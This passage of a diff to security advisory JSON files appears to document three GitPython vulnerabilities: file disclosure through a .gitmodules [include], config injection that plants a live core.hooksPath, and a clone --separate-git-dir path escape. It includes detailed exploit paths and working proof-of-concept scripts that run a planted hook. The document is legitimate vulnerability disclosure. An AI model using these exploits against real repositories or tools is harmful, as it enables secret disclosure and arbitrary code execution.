content shipped\ninside a cloned repository -- can contain `[include] path = `.\n`Submodule._config_parser()` builds the parser used for `repo.submodules` (and\nother submodule reads) via `SubmoduleConfigParser(fp_module, read_only=...)`\nwithout passing `merge_includes=False`, so the class default `merge_includes=True`\nis inherited. GitConfigParser then opens the target file; if it isn't valid\ngit-config syntax (true of virtually any non-gitconfig file), Python's\n`configparser.MissingSectionHeaderError` embeds the file's first line verbatim\nin its exception message, which propagates out of the ordinary, read-only\n`repo.submodules` call -- a non-blind local file content disclosure primitive.\n\nRun:\n PYTHONPATH=\":/gitdb:/smmap\" python3 gitpython-003-poc.py \n\nBenign: reads only the given (defaults to a throwaway secret file\ncreated under if omitted) and never writes/exfiltrates it anywhere\nexcept printing it locally to prove the primitive. No destructive action.\n\"\"\"\nimport os\nimport subprocess\nimport sys\n\n\ndef main():\n workdir = sys.argv[1] if len(sys.argv) > 1 else \"/tmp/gitpython-003-poc\"\n target_file = sys.argv[2] if len(sys.argv) > 2 else os.path.join(workdir, \"secret.txt\")\n\n attacker_repo = os.path.join(workdir, \"attacker-repo\")\n dest = os.path.join(workdir, \"dest\")\n for p in (attacker_repo, dest):\n os.makedirs(p, exist_ok=True)\n\n if not os.path.exists(target_file):\n os.makedirs(os.path.dirname(target_file), exist_ok=True)\n with open(target_file, \"w\") as f:\n f.write(\"TOP-SECRET-DB-PASSWORD=hunter2-actual-secret-value\\n\")\n\n subprocess.run([\"git\", \"init\", \"-q\", \"-b\", \"main\", attacker_repo], check=True)\n subprocess.run([\"git\", \"-C\", attacker_repo, \"config\", \"user.email\", \"a@example.com\"], check=True)\n subprocess.run([\"git\", \"-C\", attacker_repo, \"config\", \"user.name\", \"Attacker\"], check=True)\n\n with open(os.path.join(attacker_repo, \"file.txt\"), \"w\") as f:\n f.write(\"hello\\n\")\n\n with open(os.path.join(attacker_repo, \".gitmodules\"), \"w\") as f:\n f.write(\n '[submodule \"totally-normal-dep\"]\\n'\n \"\\tpath = vendor/dep\\n\"\n \"\\turl = https://example.com/dep.git\\n\"\n \"[include]\\n\"\n \"\\tpath = %s\\n\" % target_file\n )\n\n subprocess.run([\"git\", \"-C\", attacker_repo, \"add\", \"file.txt\", \".gitmodules\"], check=True)\n subprocess.run([\"git\", \"-C\", attacker_repo, \"commit\", \"-q\", \"-m\", \"init\"], check=True)\n\n import git # gitpython under test\n import configparser\n\n repo = git.Repo.clone_from(attacker_repo, dest)\n\n try:\n subs = list(repo.submodules)\n print(\"NOT VULNERABLE: no exception raised, submodules =\", subs)\n sys.exit(1)\n except configparser.MissingSectionHeaderError as e:\n msg = str(e)\n print(\"VULNERABLE: MissingSectionHeaderError leaked file content via repo.submodules:\")\n print(msg)\n with open(target_file) as f:\n first_line = f.readline().rstrip(\"\\n\")\n if first_line in msg:\n print(\"Confirmed: target file's first line is present verbatim in the exception message.\")\n sys.exit(0)\n else:\n print(\"NOT VULNERABLE: exception message did not contain the expected content\")\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n\n```", "severity": [ { "type": "CVSS_V3", - "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" } ], "references": [ + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-7833-fr7j-v32q" + }, { "type": "ADVISORY", - "url": "https://www.vulncheck.com/advisories/gitpython-before-local-file-content-disclosure-via-gitmodules" + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78675" }, { - "type": "EVIDENCE", - "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-7833-fr7j-v32q" + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/pull/2211" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/commit/ef7568e3b317ce617eacda39b8b54dcdff8c3b5c" + }, + { + "type": "PACKAGE", + "url": "https://github.com/gitpython-developers/GitPython" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.59" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3785.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-local-file-content-disclosure-via-gitmodules" } ] } diff --git a/advisories/BREW-legit-CVE-2026-78676.json b/advisories/BREW-legit-CVE-2026-78676.json index 20a73420fe..32ae9e50e2 100644 --- a/advisories/BREW-legit-CVE-2026-78676.json +++ b/advisories/BREW-legit-CVE-2026-78676.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-78676", "published": "2026-09-04T09:19:02Z", - "modified": "2026-09-05T09:12:41Z", + "modified": "2026-09-10T19:40:06Z", "upstream": [ "PYSEC-2026-3786", "CVE-2026-78676", @@ -52,21 +52,38 @@ } ] }, - "details": "GitPython before 3.1.59 fails to safely re-serialize multi-line git-config values during write operations, corrupting dormant quoted values into injected directives like core.hooksPath. Attackers can craft config files with embedded newlines that become live git directives after any unrelated GitPython config write, enabling arbitrary code execution via hook invocation.", + "summary": "GitPython: Dormant multi-line git-config values are corrupted into live injected directives (e.g. core.hooksPath) on any unrelated GitConfigParser write, enabling RCE", + "details": "- **CWE:** CWE-88 (Argument Injection) / CWE-94 (Code Injection) — via a read-then-corrupt-on-rewrite config round trip, not a direct setter argument\n- **Affected component:** `git/config.py` — `GitConfigParser._read()` (multi-line value decoding, lines 444-541, esp. `string_decode()` at line 460 and its call sites at 519/541) and `GitConfigParser._write()`/`write_section()` (serialization, lines ~694-712, esp. line 708)\n- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)\n\n## Reachability\nGitPython added `UNSAFE_CONFIG_CHARS_RE` / `_value_to_string_safe()` / `_assure_config_name_safe()` guards (commits `c417af46`, `1ed1b924`, `a495ccd3`, and PR #2176) to reject a Python string containing a raw `\\r`/`\\n`/NUL byte, or syntax-bearing characters, when it is passed as an **argument** to `set()`, `set_value()`, `add_value()`, or `add_section()`. This closed the four config-injection GHSAs above.\n\nThat guard is applied only on the write-argument surface. It is never consulted for values that entered `GitConfigParser._sections` via `_read()` — i.e. values that came from parsing an on-disk config file. And `_read()` legitimately supports standard, spec-compliant git config syntax for multi-line values: a quoted value that is not closed on the same physical line continues onto the next physical line (git's own backslash-continuation syntax), and `string_decode()` (`.decode('unicode_escape')`) decodes a literal two-character `\\n` **escape sequence** inside such a value into a real embedded LF character in the resulting Python string. No raw control byte is ever written to disk to achieve this — it's the same syntax real `git` itself uses and accepts.\n\nThe bug is in what happens when that `GitConfigParser` is later **flushed**: `write_section()` (line ~694) calls the *unsafe* `self._value_to_string(v)` — not `_value_to_string_safe()` — and \"handles\" any embedded newline in the value with `.replace(\"\\n\", \"\\n\\t\")` (line 708), emitting a bare, unquoted `` in the output file with no re-quoting and no backslash-continuation marker. Real git does **not** treat an indentation-only continuation the way GitPython's writer assumes — a value only continues across physical lines when the *previous* line ends in a literal `\\` immediately before the newline. So the moment `write_section()` re-serializes a previously-decoded multi-line value this way, the second half of that value becomes an **independent, new config line** the next time anyone (GitPython or real `git`) parses the file. If an attacker chooses the dormant value's content to be `\\nhooksPath = `, that second line is parsed as a brand-new `core.hooksPath = ` directive — live, real Git configuration, not a value.\n\n`core.hooksPath` is honored by essentially every hook-firing git operation (`commit`, `checkout`, `merge`, `push`, `rebase`, ...), giving arbitrary code execution the next time the host application performs any hook-triggering operation.\n\n## Root cause\n`GitConfigParser`'s injection guard is asymmetric: it hardens every *write-argument* entry point (the fix for the four sibling GHSAs) but never hardens the **read → corrupt-on-rewrite round trip**. A value that is 100% legitimate and inert as parsed from disk becomes a newly-injected directive purely through GitPython's own broken re-serialization logic (`write_section()` using the unsafe value-to-string path plus a continuation scheme real git doesn't recognize). The `c417af46` commit message even states its intent explicitly: *\"This preserves existing read behavior for config files that already contain multiline values while preventing GitPython from writing new unsafe values\"* — i.e. the maintainers consciously scoped the fix to the write-argument surface and did not address what happens when an already-resident multi-line value gets rewritten.\n\n## Exploit path\n1. A `.git/config` (or any file merged into it via `[include]`, see below) already contains a dormant, syntactically-legitimate multi-line quoted value, e.g.:\n ```\n [core]\n \tzzz = \"A\\nhooksPath = ../evil-hooks\\\n \"\n ```\n No raw `\\r`, `\\n`, or NUL byte appears on disk — this is standard git quoting + backslash-continuation. Real `git config --get core.hookspath` returns nothing at this point (inert); `git config --get core.zzz` returns the decoded string `A\\nhooksPath = ../evil-hooks`, identically to GitPython's own reader.\n2. The host application opens this repo with GitPython (`git.Repo(path)`, `read_only=False` implicitly for a normal `config_writer()` use) and performs **any** single, unrelated, legitimate config write on the same `GitConfigParser` instance — e.g. `repo.config_writer().set_value(\"user\", \"name\", \"Test User\")`. This is one of the most ordinary operations a GitPython-based tool performs.\n3. `GitConfigParser._write()`/`write_section()` re-serializes every resident value, including the dormant `zzz` entry, using the unsafe path. The file on disk now contains, verbatim:\n ```\n [core]\n \t...\n \tzzz = A\n \thooksPath = ../evil-hooks\n ```\n4. Real `git config --get core.hookspath` now returns `../evil-hooks` — a key that did not exist before step 2, created purely by GitPython's own write.\n5. The next hook-firing git operation (e.g. `git commit`) executes `../evil-hooks/pre-commit` (or whatever hook name the operation looks for), i.e. arbitrary attacker-chosen code execution.\n\n## Impact\nArbitrary code execution, on par with (and more directly triggered than) the already-accepted, High-severity `GHSA-mv93-w799-cj2w`/`GHSA-v87r-6q3f-2j67` \"Newline injection... enables RCE via core.hooksPath\" advisories, and requiring **no unsafe caller argument at all** — only an attacker-influenced config file plus one ordinary, unrelated write.\n\n## Preconditions\n- A config file GitPython opens read-write already contains an attacker-chosen, syntactically-valid multi-line value shaped like `\\n = `. Realistic delivery:\n 1. **Pre-existing `.git` directory shipped with a repository** — vendored/template repos, CI workspace/layer caches that preserve `.git`, \"repo\" tarball/zip distributions that include `.git/config`. The poisoned value sits directly in `.git/config`.\n 2. **The documented shared-config `[include]` pattern** (`[include] path = ../`, pointing at a file inside the working tree) — `GitConfigParser.read()` merges included files' sections into the same `_sections` dict used for writing, so a malicious public repository can ship the poisoned value inside a normal tracked file and have it activated the first time any GitPython-based tool performs any unrelated config write after clone (this requires the victim's own `.git/config` to already reference the include, e.g. via project setup tooling that adds `include.path`).\n 3. **Any host application that opens an attacker-influenced config file for read-write and later performs a legitimate write** — the exact trust-boundary the maintainers already accepted as realistic for `GHSA-v87r-6q3f-2j67` (their writeup cites MLRun's `project.push()`).\n- No authentication/role requirement inside GitPython itself.\n\n## Evidence\n- `git/config.py:460` (`string_decode`), invoked at `git/config.py:519` and `:541` inside `_read()`'s multi-line handling — decodes `unicode_escape`, turning a literal `\\n` escape into a real embedded LF.\n- `git/config.py:~694-712` (`_write()`/`write_section()`) — uses `self._value_to_string(v)` (unsafe variant) and `.replace(\"\\n\", \"\\n\\t\")` with no re-quoting.\n- `c417af46` (the CR/LF/NUL guard commit) touches only the setter path and explicitly states it preserves existing *read* behavior for multi-line values, per its own commit message.\n- `git log -S\"string_decode\"`, `-S\"write_section\"`, `-S'replace(\"\\n\", \"\\n\\t\")'` on `git/config.py` show these code paths have only ever been touched by non-security formatting/refactor commits (`a5fc1d86`, `b825dc74`, `cb68eef0`, `21ec5299`), never by a security fix.\n- PoC (`gitpython-002-poc.py`, embedded below) reproduces the full chain end-to-end against this exact checkout: dormant value → one unrelated `config_writer()` write → `core.hookspath` becomes live per real `git config --get` → a subsequent `git commit` executes the injected hook and writes a benign marker file.\n\n## False-positive check (adversarial re-read)\n- **Is this just a repeat of the four already-fixed config-injection GHSAs?** No — all four require the *caller* to pass a Python string containing a raw control character or forbidden syntax character as an argument to a setter; all four are now blocked by `UNSAFE_CONFIG_CHARS_RE`/`VALID_CONFIG_OPTION_NAME_RE`/the section quote-state-machine. This finding requires no such caller argument: the payload is smuggled entirely inside a config *file* using standard, valid git escaping that the guard never inspects, and only becomes dangerous through GitPython's own unguarded re-serialization of a value it already holds. Confirmed via `_known-advisories.json` (26 entries, none withdrawn) — none describe this read→corrupt-on-rewrite mechanism.\n- **Does real git actually round-trip this value safely (i.e. is this a GitPython-only bug, not a \"normal\" file)?** Yes, confirmed empirically: after the same crafted `.git/config` is rewritten by *real* `git config user.name Test2` (a control test), the multi-line `zzz` entry is preserved byte-for-byte in its original quoted/continuation form — only GitPython's writer corrupts it.\n- **Is there a guard elsewhere that would catch the resulting bare `hooksPath = ...` line before it's trusted?** No — once on disk, it is indistinguishable from a directive the user set intentionally; `core.hooksPath` is honored unconditionally by git's hook-invocation machinery.\n- **Does this require an unrealistic precondition?** The precondition (a config file with attacker-influenced content, later legitimately rewritten) mirrors the exact threat model the maintainers already treated as realistic and fixed for `GHSA-v87r-6q3f-2j67`.\n- Verdict: no concrete blocker found. **CONFIRMED** — reproduced independently end-to-end (dormant value in place → benign unrelated `config_writer()` write → `core.hookspath` live per real git → hook fires on `git commit`, marker file written).\n\n## Remediation\nEither (a) make `write_section()`/`_write()` use `_value_to_string_safe()` (or equivalent re-quoting) for **every** resident value, including those that originated from `_read()`, so an embedded newline is always re-emitted as a properly quoted+backslash-continued value rather than a bare new line, or (b) reject/neutralize embedded control characters in values at read time before they can reach `_sections` at all if the parser is opened in `read_only=False` mode, or (c) canonicalize output using git's own `git config --file --replace-all` semantics instead of a hand-rolled writer. Option (a) is the most surgical fix and matches the spirit of `_value_to_string_safe()` already used on the setter path.\n\n## Confidence\nHigh. Root cause independently re-derived and confirmed by direct code reading; full exploit chain (dormant value → benign unrelated write → live `core.hookspath` → hook execution with a benign marker) reproduced twice, independently, against the current HEAD.\n\n\n## Proof-of-Concept source (`gitpython-002-poc.py`)\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nGITPYTHON-002 PoC: a dormant, legitimately-encoded multi-line git-config value\n(standard quoted + backslash-continuation syntax, containing an escaped \"\\\\n\"\nthat decodes to a real embedded newline in memory) is corrupted into a NEW,\nlive config key the moment GitConfigParser re-serializes it during any\nunrelated write. If the smuggled second \"line\" looks like\n\"hooksPath = \", it becomes a real, active core.hooksPath after\none unrelated GitPython config write, and fires attacker code on the next\nhook-triggering git operation (e.g. `git commit`).\n\nThis is CWE-88/CWE-94 style argument/config injection, but via the READ path\n(a config file GitPython parses and later rewrites), not via a Python kwarg\nargument -- distinct from the already-fixed GHSA-mv93-w799-cj2w /\nGHSA-v87r-6q3f-2j67 / GHSA-3rp5-jjmw-4wv2 / GHSA-jm78-9fvv-mhgr, which all\nguard the setter-argument surface only.\n\nRun:\n PYTHONPATH=\":/gitdb:/smmap\" python3 gitpython-002-poc.py \n\nBenign: only writes/reads inside . The \"malicious\" hook just writes a\nmarker file; no destructive/exfiltrating payload. Exits non-zero and prints\n\"NOT VULNERABLE\" if the corruption / hook does not fire.\n\"\"\"\nimport os\nimport subprocess\nimport sys\n\n\ndef main():\n workdir = sys.argv[1] if len(sys.argv) > 1 else \"/tmp/gitpython-002-poc\"\n repo_dir = os.path.join(workdir, \"repo\")\n hooks_dir = os.path.join(workdir, \"evil-hooks\")\n marker = os.path.join(workdir, \"PWNED_MARKER.txt\")\n\n for p in (repo_dir, hooks_dir):\n os.makedirs(p, exist_ok=True)\n if os.path.exists(marker):\n os.remove(marker)\n\n subprocess.run([\"git\", \"init\", \"-q\", \"-b\", \"main\", repo_dir], check=True)\n subprocess.run([\"git\", \"-C\", repo_dir, \"config\", \"user.email\", \"test@example.com\"], check=True)\n subprocess.run([\"git\", \"-C\", repo_dir, \"config\", \"user.name\", \"Test\"], check=True)\n\n # Rewrite .git/config with a dormant, 100%-valid multi-line quoted value\n # inside [core] (before any other section). No raw CR/LF/NUL byte is\n # written to disk here -- this is standard git config quoting +\n # backslash-line-continuation, decoded by both real git and GitConfigParser\n # into the Python string 'A\\nhooksPath = ../evil-hooks'.\n cfg_path = os.path.join(repo_dir, \".git\", \"config\")\n with open(cfg_path) as f:\n original = f.read()\n poisoned_entry = '\\tzzz = \"A\\\\nhooksPath = ../evil-hooks\\\\\\n\"\\n'\n # Insert right after the [core] header line so it lives in the same section.\n new_config = original.replace(\"[core]\\n\", \"[core]\\n\" + poisoned_entry, 1)\n with open(cfg_path, \"w\") as f:\n f.write(new_config)\n\n # Confirm it's inert per real git before touching GitPython.\n pre = subprocess.run(\n [\"git\", \"-C\", repo_dir, \"config\", \"--get\", \"core.hookspath\"],\n capture_output=True, text=True,\n )\n if pre.returncode == 0:\n print(\"SETUP ERROR: core.hookspath already set before GitPython touched anything\")\n sys.exit(2)\n\n # Malicious hook: benign marker only.\n hook_path = os.path.join(hooks_dir, \"pre-commit\")\n with open(hook_path, \"w\") as f:\n f.write('#!/bin/sh\\necho \"PWNED-VIA-GITPYTHON-CONFIG-INJECTION\" > \"%s\"\\nexit 0\\n' % marker)\n os.chmod(hook_path, 0o755)\n\n import git # gitpython under test\n\n repo = git.Repo(repo_dir)\n before = repo.config_reader().get_value(\"core\", \"zzz\")\n print(\"core.zzz before any GitPython write =\", repr(before))\n\n # ONE totally unrelated, benign write -- this is the only \"attacker-adjacent\"\n # action required, and it is something virtually every GitPython consumer\n # does routinely (setting an option, adding a remote, updating a branch's\n # tracking config, ...).\n with repo.config_writer() as cw:\n cw.set_value(\"user\", \"name\", \"Test User\")\n\n post = subprocess.run(\n [\"git\", \"-C\", repo_dir, \"config\", \"--get\", \"core.hookspath\"],\n capture_output=True, text=True,\n )\n if post.returncode != 0:\n print(\"NOT VULNERABLE: core.hookspath still absent after the unrelated write\")\n sys.exit(1)\n\n injected_path = post.stdout.strip()\n print(\"core.hookspath is now LIVE after one unrelated write:\", injected_path)\n\n # Trigger the hook with a normal commit to prove it fires.\n with open(os.path.join(repo_dir, \"file2.txt\"), \"w\") as f:\n f.write(\"change\\n\")\n subprocess.run([\"git\", \"-C\", repo_dir, \"add\", \"file2.txt\"], check=True)\n subprocess.run(\n [\"git\", \"-C\", repo_dir, \"-c\", \"user.email=t@example.com\", \"-c\", \"user.name=T\",\n \"commit\", \"-q\", \"-m\", \"trigger hook\"],\n check=True,\n )\n\n if os.path.isfile(marker):\n with open(marker) as f:\n content = f.read().strip()\n print(\"VULNERABLE: hook fired, marker content =\", content)\n sys.exit(0)\n else:\n print(\"NOT VULNERABLE: hook did not fire\")\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n\n```", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" } ], "references": [ + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-284h-m62q-gf8w" + }, { "type": "ADVISORY", - "url": "https://www.vulncheck.com/advisories/gitpython-before-remote-code-execution-via-config-injection" + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78676" }, { - "type": "EVIDENCE", - "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-284h-m62q-gf8w" + "type": "PACKAGE", + "url": "https://github.com/gitpython-developers/GitPython" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3786.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-remote-code-execution-via-config-injection" } ] } diff --git a/advisories/BREW-legit-CVE-2026-78677.json b/advisories/BREW-legit-CVE-2026-78677.json index d70863b9a9..b8ab38a942 100644 --- a/advisories/BREW-legit-CVE-2026-78677.json +++ b/advisories/BREW-legit-CVE-2026-78677.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-78677", "published": "2026-09-04T09:19:02Z", - "modified": "2026-09-05T09:12:41Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "PYSEC-2026-3787", "CVE-2026-78677", @@ -52,21 +52,50 @@ } ] }, - "details": "GitPython before 3.1.59 omits --separate-git-dir from unsafe_git_clone_options, allowing attackers to create arbitrary git directories outside the intended clone destination. Attackers can pass a separate_git_dir parameter to Repo.clone_from() or Repo.clone() to redirect repository metadata to an attacker-controlled filesystem path, enabling arbitrary directory creation and potential hook execution.", + "summary": "GitPython: clone_from()/clone() omit --separate-git-dir from unsafe_git_clone_options, enabling arbitrary git-directory creation outside the destination", + "details": "- **CWE:** CWE-73 (External Control of File Name or Path) / CWE-22 (Path Traversal, in the \"escapes intended base directory\" sense)\n- **Affected component:** `git/repo/base.py`, `Repo.unsafe_git_clone_options` (class attribute, lines 153-165) and `Repo._clone()` (lines 1477-1520), reached via the public `Repo.clone_from()` (line 1626) and `Repo.clone()` (line 1567) APIs.\n- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)\n\n## Reachability\n`Repo.clone_from(url, to_path, **kwargs)` (and `Repo.clone()`) forward arbitrary keyword arguments to the underlying `git clone` invocation. Before forwarding, GitPython builds a candidate option list from the kwargs (`Git._option_candidates`) and checks it against a denylist, `Repo.unsafe_git_clone_options`, via `Git.check_unsafe_options()` — *unless* the caller passes `allow_unsafe_options=True`. This denylist mechanism is exactly the guard that the last ~16 published GHSAs against this repo (2026-07-12 → 2026-08-05) have repeatedly found incomplete or bypassable for other options (`--template`, `--upload-pack`, `--config`, `--exec`, `--output`, `--index-output`, `--pathspec-from-file`, etc.).\n\n`git clone` also accepts `--separate-git-dir=`, which redirects the repository's entire `.git` metadata directory to an **arbitrary, caller-controlled filesystem path**, leaving only a gitlink text file (`gitdir: `) at the intended destination. This is the exact same primitive already recognized as unsafe by GitPython's own code: `Repo.unsafe_git_init_options` (line 145-150) blocks `--separate-git-dir` for `Repo.init()`, with the comment *\"Redirects the repository metadata to a caller-controlled path\"*. The `Repo._clone()`/`clone()`/`clone_from()` docstring (line 1450-1452) is even more explicit:\n\n```\n:param allow_unsafe_options:\n Allow unsafe options to be used, such as ``--template`` and\n ``--separate-git-dir``.\n```\n\ni.e. the maintainers' own documentation states that `allow_unsafe_options=False` (the default) is supposed to block `--separate-git-dir` for clone. But **`Repo.unsafe_git_clone_options` does not contain it**:\n\n```python\nunsafe_git_clone_options = [\n \"--upload-pack\",\n \"-u\",\n \"--config\",\n \"-c\",\n \"--template\",\n \"--bundle-uri\",\n]\n```\n\nSo any application that forwards a `separate_git_dir` (or `separate-git-dir`) kwarg into `Repo.clone_from()` / `Repo.clone()` — e.g. a CI/build service, a Git-hosting proxy, or any tool that exposes a subset of clone options to a client, the exact threat model already accepted for the sibling `--template`/`--upload-pack`/`--config` entries in this same list — gets **no protection at all** for `--separate-git-dir`, even with the default `allow_unsafe_options=False`.\n\n## Root cause\nParity gap between two sibling denylists that guard the same underlying primitive (arbitrary redirection of git metadata storage): `unsafe_git_init_options` correctly lists `--separate-git-dir`; `unsafe_git_clone_options`, covering the same option on a different git subcommand that also accepts it, does not — despite the function's own docstring claiming otherwise. This is the same \"denylist omits an equally-dangerous sibling option\" pattern already responsible for `GHSA-539m-9xh6-q6rr` (`archive` denylist missing `--add-file`/`--add-virtual-file`) and `GHSA-6p8h-3wgx-97gf` (`clone` denylist missing `--template`, since fixed).\n\n## Exploit path\n1. Attacker-controlled input reaches a `separate_git_dir=...` (or equivalently `\"separate-git-dir\"`) keyword argument passed into `Repo.clone_from()` / `Repo.clone()` by the host application, with `allow_unsafe_options` left at its default `False`.\n2. `Git._option_candidates()` renders this as `--separate-git-dir` and `Git.check_unsafe_options()` checks it against `Repo.unsafe_git_clone_options` — no match, no `UnsafeOptionError` raised.\n3. `Git.transform_kwargs()` renders the same kwarg into the real command line as `--separate-git-dir=` and GitPython executes `git clone -v --separate-git-dir= -- ` via `subprocess` (no shell).\n4. `git` itself creates the full repository metadata tree (`config`, `description`, `HEAD`, `hooks/`, `index`, `objects/`, `refs/`, `packed-refs`, `logs/`) at the attacker-specified path — which can be **any path outside the intended clone destination** that the process has permission to create — and leaves a gitlink file at the intended destination pointing to it.\n\n## Impact\nArbitrary directory/file creation at a path fully controlled by the attacker (bounded only by filesystem permissions of the process running GitPython), matching the impact class of the already-published, High-severity `GHSA-hmq2-w58f-27jc` (\"Arbitrary Git Repository Creation Outside the Working Tree\", CVSS 8.2). Concretely:\n- Planting a git repository structure (including a `hooks/` directory) at an attacker-chosen location outside the sandboxed clone destination the calling application intended to confine the operation to.\n- If the attacker-chosen path collides with an existing directory the process can write into (e.g. another repository's `.git`, a shared cache path, a predictable temp location), the clone silently populates/overwrites `config`, `HEAD`, `hooks/*`, `refs/*`, `packed-refs`, and `index` there — an integrity violation of a resource outside the intended destination.\n- Combined with any later operation that runs `git` against that redirected/colliding directory (common in CI/build systems that reuse or predict working-directory layouts), this can escalate to hook execution, matching the RCE class already accepted for `--template` in `GHSA-9rj7-rf2p-w77r`.\n\n## Preconditions\n- The calling application forwards a caller-influenced value into a `separate_git_dir` kwarg of `Repo.clone_from()`/`Repo.clone()` (or into the `multi_options` list as a raw `--separate-git-dir=...` token) without itself validating/rejecting it, and does not pass `allow_unsafe_options=True` intentionally. This is the identical trust model GitPython's own denylist already defends for `--template`/`--upload-pack`/`--config`/`--bundle-uri` on the very same code path — i.e. this option was clearly meant to be covered by the same guard and was simply omitted.\n- No authentication/role requirement inside GitPython itself; the vulnerable code runs the moment the host application calls the API with the option present.\n\n## Evidence\n- `git/repo/base.py:145-151` — `unsafe_git_init_options` includes `\"--separate-git-dir\"` with the comment \"Redirects the repository metadata to a caller-controlled path\".\n- `git/repo/base.py:153-165` — `unsafe_git_clone_options` (the list actually enforced on `_clone`) does **not** include `\"--separate-git-dir\"`.\n- `git/repo/base.py:1450-1452` — docstring of `clone_from`/`clone` explicitly documents `--separate-git-dir` as one of the options `allow_unsafe_options` is supposed to gate.\n- `git/repo/base.py:1495-1518` — `_clone()` special-cases `separate_git_dir` only to `Git.polish_url()` it (path normalization for URL-like values), then runs it through `Git.check_unsafe_options(options=..., unsafe_options=cls.unsafe_git_clone_options)` — which, per the list above, does not flag it.\n- PoC (`gitpython-001-poc.py`, embedded below) run against this exact checkout confirms the option reaches the real `git clone` subprocess unguarded and creates a full git directory outside the destination path, with `allow_unsafe_options` at its default `False`.\n\n## False-positive check (adversarial re-read)\n- **Is there a value-level check that would still stop this?** No — `check_unsafe_options` only inspects option *names* (via `_canonicalize_option_name`) against the denylist; it performs no filesystem/path validation on `separate_git_dir`'s value, and no other guard in `_clone()` touches this kwarg besides the `Git.polish_url()` normalization (which does not reject arbitrary paths).\n- **Is `--separate-git-dir` perhaps a no-op or safely sandboxed for `clone` specifically (unlike `init`)?** No — confirmed empirically: the option reaches the real `git` binary unmodified and git honors it exactly as documented, writing the full metadata tree to the given path.\n- **Could this be the exact bug already covered by one of the 26 published GHSAs?** Checked all 26 entries in `_known-advisories.json` (Filter 0): `GHSA-9rj7-rf2p-w77r` covers `--template` in `Repo.init`; `GHSA-6p8h-3wgx-97gf` covers `--template` in clone (already fixed, present in `unsafe_git_clone_options`); `GHSA-hmq2-w58f-27jc` covers arbitrary repo creation via unvalidated **`.gitmodules` submodule names** (a different code path — `Submodule`, not `Repo.clone_from()` kwargs). None reference `--separate-git-dir` on the clone path. This is a distinct, currently-unpatched gap.\n- **Does this require an unrealistic precondition?** The precondition (host app forwards a kwarg into `clone_from`/`clone`) is identical to the precondition already accepted by the maintainers for the sibling entries in the same list (`--template`, `--upload-pack`, `--config`, `--bundle-uri`) — i.e. it is the same threat model the guard exists to cover, just missing one entry.\n- Verdict: no concrete blocker found. **CONFIRMED.**\n\n## Remediation\nAdd `\"--separate-git-dir\"` (and its `-` alias if git ever adds one — currently there is none) to `Repo.unsafe_git_clone_options` in `git/repo/base.py`, matching `unsafe_git_init_options`. Since `Repo._clone()` already special-cases `separate_git_dir` for `Git.polish_url()` normalization, the fix is a one-line addition to the existing list, consistent with how `GHSA-6p8h-3wgx-97gf` added `--template` to the same list.\n\n## Confidence\nHigh. Root cause is a one-line, unambiguous omission the maintainers' own docstring contradicts; PoC reproduces cleanly and deterministically against the current HEAD; no plausible false-positive path found.\n\n\n## Proof-of-Concept source (`gitpython-001-poc.py`)\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nGITPYTHON-001 PoC: Repo.clone_from(separate_git_dir=...) is not in\nunsafe_git_clone_options, so it reaches `git clone` unguarded and writes a\nfull git directory (config, hooks/, objects/, refs/, ...) to an\nattacker-controlled path OUTSIDE the intended destination directory, with\nallow_unsafe_options left at its default of False.\n\nRun against the GitPython source tree under test, e.g.:\n PYTHONPATH=\":/gitdb:/smmap\" python3 gitpython-001-poc.py \n\nBenign: only writes/reads inside the given workdir. No destructive/exfiltrating\npayload. Exits non-zero and prints \"NOT VULNERABLE\" if the guard blocks the option\nor the write does not escape the destination directory.\n\"\"\"\nimport os\nimport sys\nimport subprocess\n\n\ndef main():\n workdir = sys.argv[1] if len(sys.argv) > 1 else \"/tmp/gitpython-001-poc\"\n src = os.path.join(workdir, \"src\")\n dest = os.path.join(workdir, \"dest\")\n sentinel_dir = os.path.join(workdir, 